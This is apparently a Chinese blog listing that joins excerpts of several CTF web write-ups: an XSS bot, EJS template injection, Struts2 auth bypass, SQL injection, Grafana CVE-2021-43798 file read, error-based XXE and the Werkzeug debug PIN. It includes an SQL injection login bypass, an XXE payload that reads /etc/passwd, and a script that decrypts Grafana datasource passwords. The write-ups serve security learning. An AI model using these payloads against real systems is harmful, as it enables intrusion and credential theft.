CTF

又是一个XSS题，Docker里起了一个Web一个Bot一个Redis，Web使用Java写的，用的Eclipse的Jetty服务器，上层是Micronaut微服务框架来的，整体打包成一个JAR。 附件地址：CTF-Chal/fancy-notes.zip (github.com) 一开始还以为是Java相关的漏洞，随手看了下反编译，发现好像除了题目是Java写的之外和Java没啥关系，同理Redis也只是个用来传数据的中间媒介，似乎也利用不了什么漏洞。于是继续关注题目本身的逻辑。 先看Bot做了啥： 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 const puppeteer = require("puppeteer"); const Redis = require('ioredis'); const connection = new Redis(6379, process.env.REDIS_HOST ?? "127.0.0.1"); const browser_option = { headless: true, args: [ '--no-sandbox', '--disable-gpu', '--js-flags="--noexpose_wasm --jitless"', ], executablePath: "google-chrome-stable" }; const MAIN_SITE = process.env.MAIN_SITE ?? "http://127.0.0.1:8000" const FLAG = process.env.FLAG ?? "flag{test}" const sleep = (delay) => { return new Promise((resolve) => setTimeout(resolve, delay)) } async function browse(url) { console.log(`[+] browsing ${url} started`) const browser = await puppeteer.launch(browser_option); const page = await browser.newPage(); page.on('dialog', async (dialog) => { await dialog.dismiss(); }); try { await page.goto(MAIN_SITE, { timeout: 3000, waitUntil: 'domcontentloaded' }); await sleep(1000); await page.setCookie({ name: "FLAG", value: FLAG, domain: new URL(MAIN_SITE).hostname, path: "/", secure: false, httpOnly: true }); await page.goto(url, { timeout: 3000, waitUntil: 'domcontentloaded' }); await sleep(5000); console.log(await page.cookies(MAIN_SITE)); } catch (err) { console.log(err); } finally { await page.close(); await browser.close(); } console.log(`[+] browsing ${url} finished`) } const handler = async () => { console.log('[+] Starting bot'); while (true) { console.log("[+] Working ") connection.blpop('urls', 0, async (err, message) => { try { let url = message[1]; let parsed = new URL(url); if (parsed.protocol !== 'http:' && parsed.protocol !== 'https:') { throw new Error('Invalid protocol'); } else { console.log('[+] Visiting ' + url); await browse(url); } await sleep(3000); } catch (e) { } }); await sleep(3000) } } handler(); 能看见Bot首先访问了网站的首页，然后把Flag写进了Cookie里面，加了HTTP Only（这个是重点，等会会考），然后就会访问提交给Bot的URL了。Bot是死循环从Redis里面读URL，网站里也有相关的逻辑。 ...

valentine Web签到题，考的是Node.js的ejs模板库命令执行。首先给出源码，里面的库版本都是最新的： 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 var express = require('express'); var bodyParser = require('body-parser') const crypto = require("crypto"); var path = require('path'); const fs = require('fs'); var app = express(); viewsFolder = path.join(__dirname, 'views'); if (!fs.existsSync(viewsFolder)) { fs.mkdirSync(viewsFolder); } app.set('views', viewsFolder); app.set('view engine', 'ejs'); app.use(bodyParser.urlencoded({ extended: false })) app.post('/template', function(req, res) { let tmpl = req.body.tmpl; let i = -1; while((i = tmpl.indexOf("<%", i+1)) >= 0) { if (tmpl.substring(i, i+11) !== "<%= name %>") { res.status(400).send({message:"Only '<%= name %>' is allowed."}); return; } } let uuid; do { uuid = crypto.randomUUID(); } while (fs.existsSync(`views/${uuid}.ejs`)) try { fs.writeFileSync(`views/${uuid}.ejs`, tmpl); } catch(err) { res.status(500).send("Failed to write Valentine's card"); return; } let name = req.body.name ?? ''; return res.redirect(`/${uuid}?name=${name}`); }); app.get('/:template', function(req, res) { let query = req.query; let template = req.params.template if (!/^[0-9A-F]{8}-[0-9A-F]{4}-[4][0-9A-F]{3}-[89AB][0-9A-F]{3}-[0-9A-F]{12}$/i.test(template)) { res.status(400).send("Not a valid card id") return; } if (!fs.existsSync(`views/${template}.ejs`)) { res.status(400).send('Valentine\'s card does not exist') return; } if (!query['name']) { query['name'] = '' } return res.render(template, query); }); app.get('/', function(req, res) { return res.sendFile('./index.html', {root: __dirname}); }); app.listen(process.env.PORT || 3000); 功能点就是可以自定义模板内容，生成并渲染，但是对模板中ejs的tag进行了严格限制，只能存在<%= name %>这一种tag，否则就会被ban。 ...

一个硬核的XSS题，收获相当大（还得感谢CrumbledWall师傅点拨了我几次） 开局给了后端的源码，能看见里面用了腾讯的COS对象存储，可以上传文件到上面，docker-compose.yml里面还有一个名为的bot的服务但没有给出源码，能看出来后端有个接口会去连接这个bot。 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 const express = require("express") const isJpg = require('is-jpg') const isPng = require('is-png') const isWebp = require('is-webp') const fs = require('fs') const fileUpload = require('express-fileupload') const bodyParser = require('body-parser') const net = require('net') const crypto = require("crypto") const https = require('https') var COS = require('cos-nodejs-sdk-v5') const app = express() const BOT_HOST = 'bot' const BOT_PORT = 8080 app.use(fileUpload({ limits: { fileSize: 2 * 1024 * 1024 // 2 MB }, abortOnLimit: true })) app.use(bodyParser.urlencoded({ extended: true })) async function uploadFileToCOS(file, fileName) { var cos = new COS({ SecretId: 'xxxxxxxxxxxxxx', SecretKey: 'xxxxxxxxxxxxxx' }); cos.putObject({ Bucket: 'nese-1300117079', /* 填入您自己的存储桶，必须字段 */ Region: 'ap-beijing', /* 存储桶所在地域，例如ap-beijing，必须字段 */ Key: fileName, /* 存储在桶里的对象键（例如1.jpg，a/b/test.txt），必须字段 */ Body: Buffer.from(file.data), /* 必须 */ }, function(err, data) { try { if (data.statusCode == 200) { return "File uploaded successfully! You can visit the file at " + data.Location } else { return "Failed!" } } catch (err) { return "Failed!" } }) } app.get("/", (req, res) => { fs.readFile('index.html', 'utf-8', (err, data) => { if (err) throw err let generateNonce = crypto.randomBytes(16).toString("hex") const dataReplaced = data.replace(/nonce_must_be_replaced/g, generateNonce) res.write(dataReplaced) res.end() }) }) app.post('/upload/:md5', async (req, res) => { if (!req.files) return res.status(400).send(response('No files were uploaded.')) const md5Regex = /^[0-9a-fA-F]{32}$/ const srcUrl = "https://nese-1300117079.cos.ap-beijing.myqcloud.com/" var suffix = req.files.newImage.name.split('.').slice(-1) var fileName = req.params.md5 + '.' + suffix if ((isPng(req.files.newImage.data) || isJpg(req.files.newImage.data) || isWebp(req.files.newImage.data)) && md5Regex.test(req.params.md5) && suffix != 'js' && suffix != 'html' && suffix != 'htm') { response = await uploadFileToCOS(req.files.newImage, fileName) res.send(response) } else { res.send("Failed!") } }) app.post("/report", function (req, res) { const { url } = req.body if (url.search('https://challenge/') != 0) { return res.status(400).send('Invalid URL') } console.log(`[+] Sending ${url} to bot`) try { const client = net.connect(BOT_PORT, BOT_HOST, () => { client.write(url) }) let response = '' client.on('data', data => { response += data.toString() client.end() }) client.on('end', () => res.send(response)) } catch (e) { console.log(e) res.status(500).send('Something is wrong...') } }) const credentials = { key: fs.readFileSync('/opt/credentials/privatekey.pem'), cert: fs.readFileSync('/opt/credentials/certificate.pem') }; const httpsServer = https.createServer(credentials, app) httpsServer.listen(443) /* app.listen(8000, () => { console.log(`App 🚀 @ http://localhost:8000`) })*/ 寻找前端可控点 接下来看前端。首先发现前端有个异常严格的CSP，这里面的nonce每次刷新都会生成一个新的。 ...

Easy_S2 这题主要考察的是Struts2的路径匹配规则以及Java Web中的Security-Constraint安全约束选项。题目附件是一个.war包，将其解压之后可以直接通过Tomcat部署，代码实现也很简单。通过web.xml可以了解到整个网站的路由都被导向了中间Struts2，同时有两条安全约束项： 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 <?xml version="1.0" encoding="UTF-8"?> <web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaee http://xmlns.jcp.org/xml/ns/javaee/web-app_3_1.xsd" version="3.1"> <filter> <filter-name>struts2</filter-name> <filter-class>org.apache.struts2.dispatcher.filter.StrutsPrepareAndExecuteFilter</filter-class> </filter> <!-- 整个网站的路由都由Struts2处理 --> <filter-mapping> <filter-name>struts2</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> <!-- /img/* 和 /index.jsp 不需要认证即可访问 --> <security-constraint> <display-name>pass-static</display-name> <web-resource-collection> <web-resource-name>static</web-resource-name> <url-pattern>/img/*</url-pattern> <url-pattern>/index.jsp</url-pattern> </web-resource-collection> </security-constraint> <security-constraint> <display-name>interceptor</display-name> <web-resource-collection> <web-resource-name>flag</web-resource-name> <url-pattern>/*</url-pattern> </web-resource-collection> <auth-constraint/> <!-- 剩下的路由需要认证才能访问 --> </security-constraint> <login-config> <!-- 认证方式为Basic Auth --> <auth-method>BASIC</auth-method> </login-config> </web-app> 因为这两条安全约束项的存在，访问被限制为只有路由/img/*和/index.jsp可以直接访问，其余的若没有经过认证则会返回403。但现在没有有关认证用户密码相关的任何信息，于是先看看其他的配置文件。在WEB-INF/classes/struts.xml中，定义了Struts2的路由规则： ...

学到了一些SQL注入的新姿势~ ezweb 首先是一个登录页，随便输入后发现会显示出查询数据库的具体语句： 于是想到可能有注入，试了一下万能密码admin' or 1=1 -- ，竟然成功进去了 登进去之后发现一个修改个人信息的功能点，可以上传头像： 尝试传个一句话上去，但发现存在后缀名的黑名单，和PHP相关的后缀名不是被ban了就是没解析，其他格式也不会被解析。还搜了一下，PHP在FashCGI模式下，也支持类似Apache里面.htaccess的独立配置文件用法，可以在某个文件夹创建一个名为.user.ini的配置文件，该配置仅对当前目录生效。但后面又发现.ini也被ban了……所以也没法通过修改解析格式的方式来解析脚本了（具体.user.ini能不能修改解析方式也没有去深究，找个时间研究一下） 除此之外，发现文件内容也会被替换，比如?会被替换成!，使得PHP起始的标签没法构造： 不过其他的过滤倒也没有，可以使用<script language="php"></script>来绕过PHP标签的过滤，来写入一句话。 一句话传上去了，接下来就想着怎么执行。因为无论怎么传也没法解析，黑名单也没法绕过，于是想到是不是可能有其他的包含点，翻源码翻来翻去，在用户列表的页面里找到了一个小提示，果然有包含点： 然后就是直接包含上传的一句话，执行命令cat /flagaaaaaaaaaaaa拿到Flag： sqli 一道很直白的SQL注入题，随便试了一下发现有报错，根据报错信息可以知道传参外面是包裹了一层单引号的。尝试了不少关键词都显示hack，于是首先fuzz了一下黑名单，发现过滤的有亿点多： 除去常见的关键字外，还过滤了下面这几类： 所有的空白字符，包括空格、\n、\t、\x00等； 所有的注释符（//除外但并不能注释成功）； information_schema； 逻辑运算&&、||、OR； 时间盲注相关：sleep、benchmark； 字符串截取函数substr、substring、mid、left、right； …… 对于空格的绕过，可以使用括号来括住表达式，这样可以不使用空格；但测试了一波之后，发现虽然UNION SELECT没有被过滤，但因为无法使用注释符，使得尾部的单引号无法被注释导致UNION SELECT无法构造成功。联合注入就走不通了。 遂尝试布尔盲注，首先子字符串的截取函数被ban，但又需要找到个办法来判断子字符串，翻了翻手册找到了locate函数，虽然没法截取字符串直接返回，但可以返回指定子字符串的索引值，似乎是个曲线救国的办法： LOCATE(substr,str), LOCATE(substr,str,pos) The first syntax returns the position of the first occurrence of substring substr in string str. The second syntax returns the position of the first occurrence of substring substr in string str, starting at position pos. Returns 0 if substr is not in str. Returns NULL if any argument is NULL. ...

感觉可以抽个时间专门再学学SQL注入了… Web easy_grafana 打开题目，Grafana v8.2.6，经典CVE-2021-43798，但是原始的POC没法用，返回400，后来查了一下发现可能是中间件对URL做了标准化导致没法打，在POC中添加#可以顺利绕过。 读取配置文件/etc/grafana/grafana.ini，发现SecretKey： 1 secret_key = SW2YcwTIb9zpO1hoPsMm 然后就是脱裤/var/lib/grafana/grafana.db，在data_source表中的secure_json_data列中找到加密后的登录密码： 1 {"password":"b0NXeVJoSXKPoSYIWt8i/GfPreRT03fO6gbMhzkPefodqe1nvGpdSROTvfHK1I3kzZy9SQnuVy9c3lVkvbyJcqRwNT6/"} 随便Github找了个脚本解密即可： 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 import base64 from hashlib import pbkdf2_hmac from Crypto.Cipher import AES saltLength = 8 aesCfb = "aes-cfb" aesGcm = "aes-gcm" encryptionAlgorithmDelimiter = '*' nonceByteSize = 12 def decrypt(payload, secret): alg, payload, err = deriveEncryptionAlgorithm(payload) if err is not None: return None, err if len(payload) < saltLength: return None, "Unable to compute salt" salt = payload[:saltLength] key, err = encryptionKeyToBytes(secret, salt) if err is not None: return None, err if alg == aesCfb: return decryptCFB(payload, key) elif alg == aesGcm: return decryptGCM(payload, key) return None, None def encryptionKeyToBytes(secret, salt): return pbkdf2_hmac("sha256", secret.encode("utf-8"), salt, 10000, 32), None def deriveEncryptionAlgorithm(payload): if len(payload) == 0: return "", None, "Unable to derive encryption" if payload[0] != encryptionAlgorithmDelimiter.encode(): return aesCfb, payload, None payload = payload[:1] def decryptGCM(payload, key): nonce = payload[saltLength: saltLength+nonceByteSize] payload = payload[saltLength+nonceByteSize:] gcm = AES.new(key, AES.MODE_GCM, nonce, segment_size=128) return gcm.decrypt(payload).decode(), None def decryptCFB(payload, key): if len(payload) < AES.block_size: return None, "Payload too short" iv = payload[saltLength: saltLength + AES.block_size] payload = payload[saltLength+AES.block_size:] cipher = AES.new(key, AES.MODE_CFB, iv, segment_size=128) return cipher.decrypt(payload).decode(), None if __name__ == "__main__": grafanaIni_secretKey = "SW2YcwTIb9zpO1hoPsMm" dataSourcePassword = "b0NXeVJoSXKPoSYIWt8i/GfPreRT03fO6gbMhzkPefodqe1nvGpdSROTvfHK1I3kzZy9SQnuVy9c3lVkvbyJcqRwNT6/" encrypted = base64.b64decode(dataSourcePassword.encode()) pwdBytes, _ = decrypt(encrypted, grafanaIni_secretKey) print(pwdBytes) Reference pedrohavay/exploit-grafana-CVE-2021-43798 Grafana 文件读取漏洞分析与汇总(CVE-2021-43798) - CTF+ ctf_cloud 题目点进去有注册和登录，附件给了源码，顺手就找到了注册和登录的路由： ...

赛后复盘发现感觉自己脑洞还是不够大。。。里面的Web题虽然难度不大但还是学到了一些零零碎碎的知识点 关卡1 给了一个URL，打开后显示需要输入手机号获取验证码，随便打了一个发现发送验证码的接口有Debug信息直接把验证码返回了： 输入验证码后进入网站，就一个十分简陋的网站，有四个直播间页面，都在放TSRC的宣传视频hhh，然后扫接口在点赞的地方找到了一个XXE（赛后复盘的时候站已经关了，放一张当时的截图） 总之当时就是发现可以本地读取文件但是没有回显，而且像上图加载进XML的数据还是会被带进后端查询直播的用户，如图中/sys/kernel/fscaps的值是1，带进去能够找到用户ID为1的用户所以返回500，如果没找到就返回No such streamer的消息。又试了几回发现没法加载远程DTD文件，于是当时就放着没管了 赛后看wp学到了一个没见过的操作就是基于XML报错的XXE，https://j7ur8.github.io/WebBook/PHP/报错XXE.html，感觉原理就是把远程加载的东西直接写进了ENTITY里面，但是因为变量解析的原因需要嵌套包含两三层，最终的结果就是把要读取的文件读到了exp字符串里面，然后尝试去包含带有错误字符串的文件产生报错，在报错信息里也就会输出文件的内容。 1 2 3 4 5 6 7 8 9 10 11 <?xml version="1.0" ?> <!DOCTYPE message [ <!ENTITY % condition ' <!ENTITY &#x25; file SYSTEM "file:///etc/passwd"> <!ENTITY &#x25; eval "<!ENTITY &#x26;#x25; error SYSTEM &#x27;file:///nonexistent/&#x25;file;&#x27;>"> &#x25;eval; <!-- 把报错的ENTITY通过引用加载进来 --> &#x25;error; <!-- 引用会产生报错的ENTITY error, 然后error会去加载里面的file引用实体内容，从而产生一个错误的URI --> '> %condition; ]> <message>any text</message> 通过这种方法，结合proc就能够读到后端的代码/proc/self/cwd/app.py，然后发现模块config，读取config.py拿到flag。 ...

虽然比赛时只做出来一道题，但确实玩的挺开心的，所以记录一下 oh-my-grafana 该题用到了Grafana应用中最为广泛的一个CVE漏洞CVE-2021-43798，可以未授权通过Grafana的插件实现任意文件读取。 通过搜索获取到Grafana的配置文件路径/etc/grafana/grafana.ini，在里面翻到了管理员的帐号和密码（一开始我还以为不会这么简单，还去读取了一下Grafana的数据库，/var/lib/grafana/grafana.db） 然后利用后台的数据库查询工具，查询Grafana的数据库获得flag。 oh-my-notepro 打开网站后是一个简单的笔记界面，创建账户登录进去之后就可以写笔记并且查看笔记： 点进去笔记详情页，很容易发现URL格式为/view?note_id=at8k8cdp6874vqcvzifietexy4gtnpey，尝试修改为不存在的note_id，产生报错，发现后端是Flask而且开启了调试模式，查看错误代码发现是SQL查询错误： 于是尝试注入，发现轻松注进去，没有任何过滤： 但是翻看了一阵子数据库之后发现没什么有用的信息，且数据库为USAGE权限所以没法提权。翻看了一下其他的功能点，整个网站的功能也十分单一并没有发现额外的功能，所以接着把关注点放在了Flask的调试模式上。 注意到在报错代码的右侧有个小按钮，名为Open an interactive python shell in this frame，也就是可以直接起一个Python shell，但是需要一个Debug PIN才能解锁。 于是搜索发现这个PIN可以直接生成，参考文章https://www.daehee.com/werkzeug-console-pin-exploit/。文章中提到这个PIN是由四个公共变量和两个私有变量经过哈希生成的，也就是下面这一段： 1 2 3 4 5 6 7 8 9 10 11 probably_public_bits = [ 'web3_user',# username 'flask.app',# modname 'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__')) '/usr/local/lib/python3.5/dist-packages/flask/app.py' # getattr(mod, '__file__', None), ] private_bits = [ '279275995014060',# str(uuid.getnode()), /sys/class/net/ens33/address 'd4e6cb65d59544f3331ea0425dc555a1'# get_machine_id(), /etc/machine-id ] probably_public_bits中的用户名和Flask包路径分别在数据库和调试信息中可以获取到，接下来就剩下这两个私有的变量需要读取对应的文件才能获取到。一开始尝试用MySQL的LOAD_FILE来包含文件但是一直返回空值，赛后经群友指点学到了一个新的MySQL语法LOAD DATA（https://dev.mysql.com/doc/refman/5.7/en/load-data.html），可以直接将文件中的数据读取至表中。因为这个语句没法制定读进哪个列，所以读进已有的表似乎可能性不大（第一列都是ID，数据类型一转换就没了），尝试创建一个新表，发现可以创建，于是通过写入新表的方式可以获取到这些信息，Payload如下： ...